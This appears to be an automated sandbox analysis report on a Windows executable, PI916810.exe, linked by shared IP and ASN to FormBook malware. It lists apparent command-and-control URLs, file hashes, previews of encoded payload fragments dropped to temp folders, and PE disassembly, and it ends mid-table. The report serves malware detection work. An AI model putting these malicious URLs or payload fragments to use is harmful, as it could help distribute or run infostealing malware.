                                                                                                                                                                          HCA Information:
                                                                                                                                                                          • Successful, ratio: 100%
                                                                                                                                                                          • Number of executed functions: 61
                                                                                                                                                                          • Number of non-executed functions: 266
                                                                                                                                                                          Cookbook Comments:
                                                                                                                                                                          • Found application associated with file extension: .exe
                                                                                                                                                                          • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                                                                                                          Warnings

                                                                                                                                                                          • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                                          • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                          • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                          • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                          • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                                          • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                                                                                                          • Report size getting too big, too many NtOpenKey calls found.
                                                                                                                                                                          • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                          • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                          • VT rate limit hit for: PI916810.exe

                                                                                                                                                                          Simulations

                                                                                                                                                                          Behavior and APIs

                                                                                                                                                                          TimeTypeDescription
                                                                                                                                                                          21:14:22API Interceptor7653113x Sleep call for process: explorer.exe modified
                                                                                                                                                                          21:14:45API Interceptor6948846x Sleep call for process: WWAHost.exe modified

                                                                                                                                                                          Joe Sandbox View / Context

                                                                                                                                                                          IPs

                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                          199.59.243.227IMPORT PERMITS.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • www.deepfy.xyz/t7p4/
                                                                                                                                                                          WER9Fz381n.exeGet hashmaliciousGluptebaBrowse
                                                                                                                                                                          • ww82.trythisgid.com/
                                                                                                                                                                          SALES ORDER875.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • www.9net88.net/ge07/?AZFdK=5jGt1VUhS4spDnR&bb=rInKjcPO3O96ojanc4NFv2coOl+G9i0Xo3vzod/XDYjf3VmyXg5Nkxs22tP8faITl6ID
                                                                                                                                                                          draft contract for order #782334.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • www.deepfy.xyz/t7p4/
                                                                                                                                                                          VkTNb6p288.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • www.662-home-nb.shop/90v4/
                                                                                                                                                                          NF_Payment_Ref_FAN930276.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • www.rebel.tienda/7n9v/
                                                                                                                                                                          SWIFT.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • www.migraine-massages.pro/ym43/?1Do0qp=lxK8zDwlVeZA0KFinmdrczEoh9foX2bLCYsrgBVnd1hBfzxarUrY7JsYsrWqjgtO371UEdIqaCaBOhfuQGtRaIpZZY1Y+O2jmybRXdJyK6xs6rkJOg==&yNNX=snRp
                                                                                                                                                                          #10302024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • www.migraine-massages.pro/ym43/
                                                                                                                                                                          18in SPA-198-2024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • www.rebel.tienda/7n9v/
                                                                                                                                                                          WARUNKI UMOWY-pdf.bat.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                          • www.allforai.xyz/puo4/

                                                                                                                                                                          Domains

                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                          94950.bodis.comSALES ORDER875.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 199.59.243.227
                                                                                                                                                                          Invoice & Packing list For Sea Shipment.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 199.59.243.227
                                                                                                                                                                          Invoice Packing list For Sea Shipment.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 199.59.243.227
                                                                                                                                                                          Invoice Packing list For Sea Shipment.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 199.59.243.227
                                                                                                                                                                          OVERDUE BALANCE.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 199.59.243.227
                                                                                                                                                                          PO23100072.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 199.59.243.227
                                                                                                                                                                          PO-000001488.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 199.59.243.227
                                                                                                                                                                          Enquiry.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 199.59.243.227
                                                                                                                                                                          Amended Proforma #U2013 SMWD5043.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 199.59.243.227
                                                                                                                                                                          RECIEPT.PDF.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 199.59.243.227

                                                                                                                                                                          ASNs

                                                                                                                                                                          MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                          BODIS-NJUSIMPORT PERMITS.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 199.59.243.227
                                                                                                                                                                          debug.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 199.59.243.227
                                                                                                                                                                          hi.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                                          • 199.59.243.227
                                                                                                                                                                          WER9Fz381n.exeGet hashmaliciousGluptebaBrowse
                                                                                                                                                                          • 199.59.243.227
                                                                                                                                                                          SALES ORDER875.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 199.59.243.227
                                                                                                                                                                          draft contract for order #782334.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 199.59.243.227
                                                                                                                                                                          VkTNb6p288.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 199.59.243.227
                                                                                                                                                                          NF_Payment_Ref_FAN930276.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 199.59.243.227
                                                                                                                                                                          SWIFT.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 199.59.243.227
                                                                                                                                                                          #10302024.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                          • 199.59.243.227

                                                                                                                                                                          JA3 Fingerprints

                                                                                                                                                                          No context

                                                                                                                                                                          Dropped Files

                                                                                                                                                                          No context

                                                                                                                                                                          Created / dropped Files

                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\PenWorkspace\DiscoverCacheData.dat

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Windows\explorer.exe
                                                                                                                                                                          File Type:JSON data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):1022
                                                                                                                                                                          Entropy (8bit):5.252542495586483
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:24:YqHZ6T06Mhm50mMb0O0bihm5TmM6CUXyhm5+dmMbxdB6hm5CUmMz0Jahm5gmMbNS:YqHZ6T06McbMb0O0bicMMDUXycRMbxdy
                                                                                                                                                                          MD5:2F99BED9FF8C41AFEE96B028ED8B86A2
                                                                                                                                                                          SHA1:BF4E91361EE28C5506E812F2BF8C3495676097B0
                                                                                                                                                                          SHA-256:F4C2EB86983ED94B60DD5041C9DDCCC2E06C9F4DD810A8D90FBCCAE82620741C
                                                                                                                                                                          SHA-512:834B9B236AF231632E106CAE3E2F22EF09B2445E64536C7FF0F2F61BC240AFA84BB66093135B317A227B3E2D9BBCAA1EDFE65F87483CB3C12F67C3E80E5A436C
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:moderate, very likely benign file
                                                                                                                                                                          Preview:{"RecentItems":[{"AppID":"Microsoft.MicrosoftEdge_8wekyb3d8bbwe!MicrosoftEdge","PenUsageSec":15,"LastSwitchedLowPart":2357654912,"LastSwitchedHighPart":31061703,"PrePopulated":true},{"AppID":"Microsoft.WindowsCommunicationsApps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail","PenUsageSec":15,"LastSwitchedLowPart":2347654912,"LastSwitchedHighPart":31061703,"PrePopulated":true},{"AppID":"Microsoft.Office.OneNote_8wekyb3d8bbwe!microsoft.onenoteim","PenUsageSec":15,"LastSwitchedLowPart":2337654912,"LastSwitchedHighPart":31061703,"PrePopulated":true},{"AppID":"Microsoft.Windows.Photos_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":2327654912,"LastSwitchedHighPart":31061703,"PrePopulated":true},{"AppID":"Microsoft.MSPaint_8wekyb3d8bbwe!Microsoft.MSPaint","PenUsageSec":15,"LastSwitchedLowPart":2317654912,"LastSwitchedHighPart":31061703,"PrePopulated":true},{"AppID":"Microsoft.WindowsMaps_8wekyb3d8bbwe!App","PenUsageSec":15,"LastSwitchedLowPart":2307654912,"LastSwitchedHighPart":31061703,

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\autA1F0.tmp

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\Desktop\PI916810.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):181950
                                                                                                                                                                          Entropy (8bit):7.98391881152223
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3072:2JxTKj+wW32a19Y5VhDvr7B8nBHyK4ZrVqMlOWzMRy6hiOyGGD0gA6DlqU:2JxTDwW3L19Y9Dz7wBSKgRhy1WD0gA+X
                                                                                                                                                                          MD5:18AD59E334ECE56028082F66A39F660B
                                                                                                                                                                          SHA1:FE62A3F2EA46432F180C5C9981C8C3C070F83FC5
                                                                                                                                                                          SHA-256:407EF06E8F0FD2E7E2951853280E56C4E447BC7C6116C1B612819D778955521D
                                                                                                                                                                          SHA-512:4EAD7C5DC15DAEEBAA62438D39BEE6D4FDD33D3B137682C13865DE039F638A6E9474C62851A05F30B01D4042116FF41A06CF6A8B48005081D2A5811232DC86C3
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Preview:EA06......`6].N.U.@y.*.O...C:s:?...U.Zmg*.X.Mi....7...5.mh.K.@.".E....?....(..G*..3z.._].T$....Au.O-..4.)\.D#..^k<.L,.J.B..........%....k...%..d.....^..gk...jX...G..j..4.S1.$@$>8.vi5.Lk3=."c....RkL...T.c.V.....Y..$.....$D..I(.A1.M.:..%V.M@...T.p.lM...bgT..(`.Mv.S..?b........VIl.E'..3^....0...(...Vi.../.8.K...................p./...1....2^_.Y$.o%..'z.U..7u.....O...4;/..b....8.g.......Vh..._%..O...u.....5uZWc_..i.M|....a.......Ts=+$.q...[l..a.q.y-..{..t.\.._%...4..*....;..Jq..k.J..UY..y[..c..v..V.B.`j..&..S..(.O)...`U.w.i:.v.@..N..W...8.Zj`.U..j..-..._.$....--N...Q.;.f.X.x....sa.....M."a..T;p...7L.U{?....<.Q.].nSCA....?o.K .^.{..[........?.@.x.WKk.....g.%...=*..%...4..-+......D..h..j1>......7.....d..5.j..+..Gv....a....}..?I..j...wY.Ef}.......u.].y..tn...W_g.pt.*......<S ....j;......o.5m.G.i..;.}........5S...V{..,.....t.....P{.-n.U..l.....m..I3..gOm..L....[.f..H.......w...4....Lc.....C..2...sc..V`..-.I....t.,...W.P.... ....n...y...%....w

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\autA220.tmp

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\Desktop\PI916810.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):14528
                                                                                                                                                                          Entropy (8bit):7.6299997798782115
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:384:FTYznwnjovkuyDTqCo1JTglf78Uqf7Nam92Woz:FAwnjoVEmCS8lO00E
                                                                                                                                                                          MD5:809D4BD2AEC5174BD9901BEF5620BA18
                                                                                                                                                                          SHA1:8EE6801FBE77D857742F7C4870F72E883F7EC586
                                                                                                                                                                          SHA-256:F291D47C92ECA6A6573DEF545CE1B5E049CB04608942ADBE303EEA8798CD2C1C
                                                                                                                                                                          SHA-512:58BEEDC4DAEAE2233F55A4BAC19314DCA75947EE0C3EB611191EAEAE34EE4CD32CA6B384FE98D88C899BD8D19FAFEA7587A4779AA39E565F298D02F3EE358480
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Preview:EA06..0...&.i..+x..f....... .V......71...@.x..L.......*.`......8............`.......Z|3@...@.........K.X@0.2.Z..Z>)..w.e....l !..m..;...| !.....;....;.....l.;.0./.<.;...m..rd.....@->.....4....f.C.5..;.............r.....X.<>`.O..p.........!.........h.=..........<|3.....c...h.. -...... ...X.Z?......(...(.G..4.h....x....M@N.......Z?.I.......N@R... ...5.(..,.._...k`........R...._.K..?d...B.... 7W.......n.../.~.....)...@...!K....h|!._....ga._.5.1.....`v/.......NA*...,...7.7.,..!6.b...Z?.K(-...0.h..&.._....' -.............-..........G.6.....d_.T......"....d_.(M..57....n.....`...L....K.L..6.s.A.?..L.......Bg>...w.36.... !...L...}....|V.4..r......$............r..9....>.....2... ...b....`......k.(.....!`....,......V1`..f....X.>i.v'.3c.........G.4....E.?......9..X.......7...l.`..."...\.61*........f.....|.`.O.......,`........nl,....C.`....p...Y......`....@n?..;g....0...d...l ...P.?'....}...........0...4.X...>y.....1......x...L.\.i.....)...@n?............b...@.>y...

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\nouses

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\Desktop\PI916810.exe
                                                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):143378
                                                                                                                                                                          Entropy (8bit):2.8384968843350653
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:192:en/SvruY7XdqMWTConYo9/W+UW5xoURoN/WtAWmPzNW/YKM2nRSn1Dq/M1WShL1x:N
                                                                                                                                                                          MD5:E89C37A64A5817A52FD2C79A99FE5C58
                                                                                                                                                                          SHA1:217710409579F22112781E2E4BAAC10B36A735DC
                                                                                                                                                                          SHA-256:1507CDF69807B5C3304BCCACEE0075D05E03E4A071651E28DEE903BA1BF378BC
                                                                                                                                                                          SHA-512:EF675FB573911B88F4461D1AC080C718989055250D2C8FE849F32581A16CE6AE515BD7CEFCF8543FC23CC6003D7B260B7047BA234EFC77563578CB0ACBD6B091
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Preview:gh5f0gh5fxgh5f5gh5f5gh5f8gh5fbgh5fegh5fcgh5f8gh5f1gh5fegh5fcgh5fcgh5fcgh5f0gh5f2gh5f0gh5f0gh5f0gh5f0gh5f5gh5f6gh5f5gh5f7gh5fbgh5f8gh5f6gh5fbgh5f0gh5f0gh5f0gh5f0gh5f0gh5f0gh5f6gh5f6gh5f8gh5f9gh5f4gh5f5gh5f8gh5f4gh5fbgh5f9gh5f6gh5f5gh5f0gh5f0gh5f0gh5f0gh5f0gh5f0gh5f6gh5f6gh5f8gh5f9gh5f4gh5fdgh5f8gh5f6gh5fbgh5fagh5f7gh5f2gh5f0gh5f0gh5f0gh5f0gh5f0gh5f0gh5f6gh5f6gh5f8gh5f9gh5f5gh5f5gh5f8gh5f8gh5fbgh5f8gh5f6gh5fegh5f0gh5f0gh5f0gh5f0gh5f0gh5f0gh5f6gh5f6gh5f8gh5f9gh5f4gh5f5gh5f8gh5fagh5fbgh5f9gh5f6gh5f5gh5f0gh5f0gh5f0gh5f0gh5f0gh5f0gh5f6gh5f6gh5f8gh5f9gh5f4gh5fdgh5f8gh5fcgh5fbgh5fagh5f6gh5fcgh5f0gh5f0gh5f0gh5f0gh5f0gh5f0gh5f6gh5f6gh5f8gh5f9gh5f5gh5f5gh5f8gh5fegh5fbgh5f8gh5f3gh5f3gh5f0gh5f0gh5f0gh5f0gh5f0gh5f0gh5f6gh5f6gh5f8gh5f9gh5f4gh5f5gh5f9gh5f0gh5fbgh5f9gh5f3gh5f2gh5f0gh5f0gh5f0gh5f0gh5f0gh5f0gh5f6gh5f6gh5f8gh5f9gh5f4gh5fdgh5f9gh5f2gh5fbgh5fagh5f2gh5fegh5f0gh5f0gh5f0gh5f0gh5f0gh5f0gh5f6gh5f6gh5f8gh5f9gh5f5gh5f5gh5f9gh5f4gh5fbgh5f8gh5f6gh5f4gh5f0gh5f0gh5f0gh5f0gh5f0gh5f0gh5f6gh5f6gh5f8gh5f9

                                                                                                                                                                          C:\Users\user\AppData\Local\Temp\zZt

                                                                                                                                                                          Download File
                                                                                                                                                                          Process:C:\Users\user\Desktop\PI916810.exe
                                                                                                                                                                          File Type:data
                                                                                                                                                                          Category:dropped
                                                                                                                                                                          Size (bytes):189440
                                                                                                                                                                          Entropy (8bit):7.864655781501552
                                                                                                                                                                          Encrypted:false
                                                                                                                                                                          SSDEEP:3072:L8qgzjPdo4DJZ6O8tStUs+ZQm/PVbF+XLtbqhxI3RcC4nLhoP67YgBmrYThlk1qJ:wqgfdo49ZEStUYmHVhqLMfC4Lho0pmYX
                                                                                                                                                                          MD5:273155CE7EC43D57266A25EFE02E28C5
                                                                                                                                                                          SHA1:B053CDCDC1416F65D6A6898842EBEE465AD31436
                                                                                                                                                                          SHA-256:6EB73F48F59381DBD0D692CD28AC3C39F8B5071B6DD2A36B61CE435BB75B4375
                                                                                                                                                                          SHA-512:E53260EA46E0426E07244D949E1837881385CB7A73662516F020AA976F1EAF9F0335BB1B78CED1D1C20CEBA2C63343DEC15D069539450367B8D941213C9CDBF2
                                                                                                                                                                          Malicious:false
                                                                                                                                                                          Reputation:low
                                                                                                                                                                          Preview:.i.e.STUJ..Z......3G..|VB...SX45N0X3D7XSTUJYMZSX45N0X3D7XS.UJYCE.V4.G.y.E{.r.=#*m*!7SG/]xP%Y6< u(<m(&6.\ ..|..5<00dT@PwX45N0X3..P...,..5..(..3....2.Y...R..0....>..<)1..5.45N0X3D7XSTUJYMZ..45.1Y3..1.TUJYMZSX.5L1S2N7X.VUJYMZSX45>.Y3D'XST.HYMZ.X4%N0X1D7]SUUJYMZVX55N0X3D.ZSTWJYMZSX65..X3T7XCTUJY]ZSH45N0X3T7XSTUJYMZSX45N0X3D7XSTUJYMZSX45N0X3D7XSTUJYMZSX45N0X3D7XSTUJYMZSX45N0X3D7XSTUJYMZSX45N0X3D7XSTUJYMZSX45N0X3D7XSTUJYMZSX45N0X3D7XSTUd-("'X45..Z3D'XST.HYMJSX45N0X3D7XSTUjYM:SX45N0X3D7XSTUJYMZSX45N0X3D7XSTUJYMZSX45N0X3D7XSTUJYMZSX45N0X3D7XSTUJYMZSX45N0X3D7XSTUJYMZSX45N0X3D7XSTUJYMZSX45N0X3D7XSTUJYMZSX45N0X3D7XSTUJYMZSX45N0X3D7XSTUJYMZSX45N0X3D7XSTUJYMZSX45N0X3D7XSTUJYMZSX45N0X3D7XSTUJYMZSX45N0X3D7XSTUJYMZSX45N0X3D7XSTUJYMZSX45N0X3D7XSTUJYMZSX45N0X3D7XSTUJYMZSX45N0X3D7XSTUJYMZSX45N0X3D7XSTUJYMZSX45N0X3D7XSTUJYMZSX45N0X3D7XSTUJYMZSX45N0X3D7XSTUJYMZSX45N0X3D7XSTUJYMZSX45N0X3D7XSTUJYMZSX45N0X3D7XSTUJYMZSX45N0X3D7XSTUJYMZSX45N0X3D7XSTUJYMZSX45N0X3D7XSTUJYMZSX45N0X3D7XSTUJYMZSX45N0X3D7XSTUJY

                                                                                                                                                                          Static File Info

                                                                                                                                                                          General

                                                                                                                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                          Entropy (8bit):6.995890202173755
                                                                                                                                                                          TrID:
                                                                                                                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                          File name:PI916810.exe
                                                                                                                                                                          File size:1'352'192 bytes
                                                                                                                                                                          MD5:dc96f5ae5ade3e42324fa9c34bc6a43d
                                                                                                                                                                          SHA1:4a882ad9ad5e3c18635c6bcebd829c7f5e4d503a
                                                                                                                                                                          SHA256:63cfb08a37c680b7bd8c3a16340a69f92e1837b9ec57104e1f826c675316e278
                                                                                                                                                                          SHA512:a397f4ee242077bb177eea07d195c5033c4e14c27484d5656a9cc525b5032d76e2509b5f16376bde4c30af9e65dc297dc94cce81f7ca47304e6644fc05bd29ca
                                                                                                                                                                          SSDEEP:24576:BAHnh+eWsN3skA4RV1Hom2KXFmIa69tlBWnMvZrcYqv89P5:Yh+ZkldoPK1Xa6/jWnwmYt
                                                                                                                                                                          TLSH:FA55BE026B9D9066FF6AA0339B25E26646787C65537384AF33D81D7B78742F1133E232
                                                                                                                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s..R...R...R....C..P.....;.S..._@#.a..._@......_@..g...[j..[...[jo.w...R...r.............#.S..._@'.S...R.k.S.....".S...RichR..

                                                                                                                                                                          File Icon

                                                                                                                                                                          Icon Hash:c58ee08c9594cd55

                                                                                                                                                                          Static PE Info

                                                                                                                                                                          General

                                                                                                                                                                          Entrypoint:0x42800a
                                                                                                                                                                          Entrypoint Section:.text
                                                                                                                                                                          Digitally signed:false
                                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                                          Subsystem:windows gui
                                                                                                                                                                          Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                                                          DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                                                                                                                                                          Time Stamp:0x672805DC [Sun Nov 3 23:23:08 2024 UTC]
                                                                                                                                                                          TLS Callbacks:
                                                                                                                                                                          CLR (.Net) Version:
                                                                                                                                                                          OS Version Major:5
                                                                                                                                                                          OS Version Minor:1
                                                                                                                                                                          File Version Major:5
                                                                                                                                                                          File Version Minor:1
                                                                                                                                                                          Subsystem Version Major:5
                                                                                                                                                                          Subsystem Version Minor:1
                                                                                                                                                                          Import Hash:afcdf79be1557326c854b6e20cb900a7

                                                                                                                                                                          Entrypoint Preview

                                                                                                                                                                          Instruction
                                                                                                                                                                          call 00007FE3A53FE97Dh
                                                                                                                                                                          jmp 00007FE3A53F1734h
                                                                                                                                                                          int3
                                                                                                                                                                          int3
                                                                                                                                                                          int3
                                                                                                                                                                          int3
                                                                                                                                                                          int3
                                                                                                                                                                          int3
                                                                                                                                                                          int3
                                                                                                                                                                          int3
                                                                                                                                                                          int3
                                                                                                                                                                          int3
                                                                                                                                                                          int3
                                                                                                                                                                          int3
                                                                                                                                                                          push edi
                                                                                                                                                                          push esi
                                                                                                                                                                          mov esi, dword ptr [esp+10h]
                                                                                                                                                                          mov ecx, dword ptr [esp+14h]
                                                                                                                                                                          mov edi, dword ptr [esp+0Ch]
                                                                                                                                                                          mov eax, ecx
                                                                                                                                                                          mov edx, ecx
                                                                                                                                                                          add eax, esi
                                                                                                                                                                          cmp edi, esi
                                                                                                                                                                          jbe 00007FE3A53F18BAh
                                                                                                                                                                          cmp edi, eax
                                                                                                                                                                          jc 00007FE3A53F1C1Eh
                                                                                                                                                                          bt dword ptr [004C41FCh], 01h
                                                                                                                                                                          jnc 00007FE3A53F18B9h
                                                                                                                                                                          rep movsb
                                                                                                                                                                          jmp 00007FE3A53F1BCCh
                                                                                                                                                                          cmp ecx, 00000080h
                                                                                                                                                                          jc 00007FE3A53F1A84h
                                                                                                                                                                          mov eax, edi
                                                                                                                                                                          xor eax, esi
                                                                                                                                                                          test eax, 0000000Fh
                                                                                                                                                                          jne 00007FE3A53F18C0h
                                                                                                                                                                          bt dword ptr [004BF324h], 01h
                                                                                                                                                                          jc 00007FE3A53F1D90h
                                                                                                                                                                          bt dword ptr [004C41FCh], 00000000h
                                                                                                                                                                          jnc 00007FE3A53F1A5Dh
                                                                                                                                                                          test edi, 00000003h
                                                                                                                                                                          jne 00007FE3A53F1A6Eh
                                                                                                                                                                          test esi, 00000003h
                                                                                                                                                                          jne 00007FE3A53F1A4Dh
                                                                                                                                                                          bt edi, 02h
                                                                                                                                                                          jnc 00007FE3A53F18BFh
                                                                                                                                                                          mov eax, dword ptr [esi]
                                                                                                                                                                          sub ecx, 04h
                                                                                                                                                                          lea esi, dword ptr [esi+04h]
                                                                                                                                                                          mov dword ptr [edi], eax
                                                                                                                                                                          lea edi, dword ptr [edi+04h]
                                                                                                                                                                          bt edi, 03h
                                                                                                                                                                          jnc 00007FE3A53F18C3h
                                                                                                                                                                          movq xmm1, qword ptr [esi]
                                                                                                                                                                          sub ecx, 08h
                                                                                                                                                                          lea esi, dword ptr [esi+08h]
                                                                                                                                                                          movq qword ptr [edi], xmm1
                                                                                                                                                                          lea edi, dword ptr [edi+08h]
                                                                                                                                                                          test esi, 00000007h
                                                                                                                                                                          je 00007FE3A53F1915h
                                                                                                                                                                          bt esi, 03h

                                                                                                                                                                          Rich Headers

                                                                                                                                                                          Programming Language:
                                                                                                                                                                          • [ASM] VS2013 build 21005
                                                                                                                                                                          • [ C ] VS2013 build 21005
                                                                                                                                                                          • [C++] VS2013 build 21005
                                                                                                                                                                          • [ C ] VS2008 SP1 build 30729
                                                                                                                                                                          • [IMP] VS2008 SP1 build 30729
                                                                                                                                                                          • [ASM] VS2013 UPD5 build 40629
                                                                                                                                                                          • [RES] VS2013 build 21005
                                                                                                                                                                          • [LNK] VS2013 UPD5 build 40629

                                                                                                                                                                          Data Directories

                                                                                                                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0xbc0cc0x17c.rdata
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0xc80000x7faa4.rsrc
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x1480000x7134.reloc
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x92bc00x1c.rdata
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0xa4b500x40.rdata
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x8f0000x884.rdata
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                                                                                                          Sections

                                                                                                                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                          .text0x10000x8dfdd0x8e000310e36668512d53489c005622bb1b4a9False0.5735602580325704data6.675248351711057IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                          .rdata0x8f0000x2fd8e0x2fe00f006ab74d3c653b5c5a6cc0c77a171a2False0.32829838446475196data5.7632462979925245IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                          .data0xbf0000x8f740x5200aae9601d920f07080bdfadf43dfeff12False0.1017530487804878data1.1963819235530628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                          .rsrc0xc80000x7faa40x7fc0071897041cba97dfe4ec33f8e54c7ca3eFalse0.6903417777641878data7.279300196547012IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                          .reloc0x1480000x71340x7200f04128ad0f87f42830e4a6cdbc38c719False0.7617530153508771data6.783955557128661IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                                                                                                          Resources

                                                                                                                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                          RT_ICON0xc86500x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishGreat Britain0.5150709219858156
                                                                                                                                                                          RT_ICON0xc8ab80x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                                                                                          RT_ICON0xc8be00x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.37682926829268293
                                                                                                                                                                          RT_ICON0xc92480x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.478494623655914
                                                                                                                                                                          RT_ICON0xc95300x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 288EnglishGreat Britain0.514344262295082
                                                                                                                                                                          RT_ICON0xc97180x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.49324324324324326
